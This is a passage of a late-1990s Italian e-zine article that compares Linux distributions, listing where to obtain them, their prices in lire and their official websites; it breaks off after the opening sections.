ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ CARATTERISTICHE DISTRIBUZIONI LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

°°±±²² ±± °°± °° ²²
±± °° ²² ° ± ° ±± ²
±± °°±±²² ° ² ° ²
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Linux: Caratteristiche di ogni distribuzione
============================================

1 Il dilemma della distribuzione
1.1 Dove le trovo?
1.2 La nostalgia di Win
2 Distribuzioni principali
2.1 Red Hat
2.2 Slackware
2.3 S.U.S.E.
2.4 Debian
2.5 Caldera
3 L'ho scelta! (Era ora)
4 Stop

1 Il dilemma della distribuzione

Ogni giorno esce una nuova distribuzione e le persone che
stanno per optare verso Linux rimangono indecise su quale
scegliere. In questo piccolo articolo vi consigliero', anzi,
vi faro' capire quale distribuzione si avvicina di piu' alle
vostre necessita'. Aspite, sto facendo un articolo che non
ha nulla a che vedere con l'hacking, che bello! Dicevo che
ogni distr. si distingue da un'altra per dei piccoli
particolari: vi e' quella piu' facile, quella piu' configurabile,
quella Free e quella commerciale.
In poche parole una per ogni esigenza!

1.1 Dove le trovo?

Ormai Linux si puo' trovare dappertutto: sulle riviste, nei negozi,
dal vostro pirata di 'fiducia', con i libri, via ftp ecc.
Ora chi di voi e' in grado di scaricarselo via ftp lo faccia,
altrimenti potrete anche comprarvi una rivista tipo: Inter.net,
Pc Magazine, Pc Action, Internet Magazine, che ogni tanto allegano
delle distribuzioni assieme al giornale. Per esempio su Inter.net
di Febbraio si puo' trovare la SUSE 6.0 che, anche se non e' completa,
come kernel ha il 2.0.36, una versione stabile e che supporta molte
periferiche. Questa non e' pubblicita', e se lo e' non me ne fotte proprio,
ma un consiglio su quali giornali comprare. Poi se avete deciso di
comprare Linux in versione completa, fatelo! L'importante e' che
abbiate parecchi soldini da parte! (scherzo!).
Ecco il prezzo di ogni distribuzione:

Red Hat Linux 5.2 œ 156.000
Caldera Open Linux 1.3 œ 150.000
S.u.S.E. Linux 5.3 œ 109.900
Slackware 3.5 œ 41.000
UnixWare 7 œ 29.900
Debian FREE

Volete anche i siti? OK!

www.redhat.com
www.caldera.com
www.suse.com
www.cdrom.com
www.sco.com
www.debian.org

1.3 La nostalgia di Win

Appena

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT